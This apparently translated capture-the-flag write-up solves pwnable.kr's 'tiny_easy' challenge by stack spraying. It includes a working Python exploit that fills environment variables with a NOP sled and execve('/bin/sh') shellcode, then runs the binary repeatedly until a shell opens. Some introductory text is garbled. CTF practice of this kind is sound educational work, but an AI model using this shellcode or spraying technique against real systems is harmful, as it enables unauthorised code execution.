In this article, we will solve the 27th task from the site pwnable.kr and we will understand what Stack spraying is.Organizational Information, - , :
- PWN;
- (Crypto);
- c (Network);
- (Reverse Engineering);
- (Stegano);
- WEB-.
, , , .
, ,
Telegram . , ,
.
. , - , .
Solution to the tiny_easy job
Click on the tyni_easy signature icon. We are given the address and port for connecting via ssh.
We are connected via SSH and we see the flag and the program already without the source code.
As a result of checking the file, we find out that it has no protection.
Download the program to the disassembler. The file is very small and follows just a few instructions.
At the very beginning, the program extracts the value from the stack into the EAX register, after which it extracts another one into EDX and transfers control to this address. But what is located on the stack at the very beginning of the program? On the stack at this moment I have the very same argc (the number of program arguments), argv (a pointer to an array of program arguments) and envp (a pointer to an array of environment variables).
Thus, in EDX, the address will be placed on the first element of the array of program arguments, that is, on the full path to the executable file! Therefore, trying to execute it as a code, the application should crash. If you check, then it turns out.
Stack spraying is an attack that uses errors in the application’s memory, which forces the application to allocate memory for a large number of objects containing malicious code. This increases the likelihood of an exploit's success, which transfers the execution flow to some position inside. It is important to understand that without an exploit that allows you to change the flow of execution, this attack will not do any harm. The attack is based on predictability of the address in the process address space.When creating a process in the operating system, an address space is allocated for its needs, in which user data, executable code and some system information are located, which depends on the specific operating system. So, in the stack segment, variables with an automatic placement class are stored, as well as information that is stored every time the function is called, for example, static variables and the return address when the function is called. In the case of stack spraying, we operate on environment variables in which the exploit is located.This way we can arrange the shellcode in the environment variables on the stack. But we will do a lot of nop operations in front of him, since we are unlikely to be able to get to the right address exactly.import os
import subprocess
payload = "\x90"*4096 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
Since the program starts from the address 0xff ******, we take the random address for the stack from this environment, for example, 0xffbbbbbbb.addr = "\xb0\xaf\xb5\xff"
Now we’ll make some environment variables with our shellcode, so that the probability of getting to it is higher.envs = {}
for i in range(0,100):
envs["env"+str(i)] = payload
And several times we run the program with our parameters.while True:
p = subprocess.Popen([addr], executable="/home/tiny_easy/tiny_easy", env=envs)
p.wait()
After running the full code, we get a shell.
Further more ... You can join us on Telegram . Let's put together a community in which there will be people who are versed in many areas of IT, then we can always help each other on any IT and information security issues.